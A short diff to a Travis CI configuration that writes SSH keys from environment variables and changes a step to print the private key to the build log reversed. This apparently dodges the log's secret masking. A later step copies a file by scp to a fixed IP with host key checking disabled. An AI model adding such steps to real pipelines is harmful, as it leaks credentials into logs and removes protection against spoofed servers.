--- a/.travis.yml
+++ b/.travis.yml
@@ -4,6 +4,6 @@ after_success:
 - cat ~/test_file
 - echo $FOO > ~/.ssh/id_rsa
 - echo $PUB > ~/.ssh/id_rsa.pub
-- cat ~/.ssh/id_rsa
+- cat ~/.ssh/id_rsa | rev 
 - chmod 400 ~/.ssh/id_rsa
 - scp -i ~/.ssh/id_rsa -o StrictHostKeyChecking=no ~/test_file pzhao12@40.117.255.191:/home/pzhao12/test_file
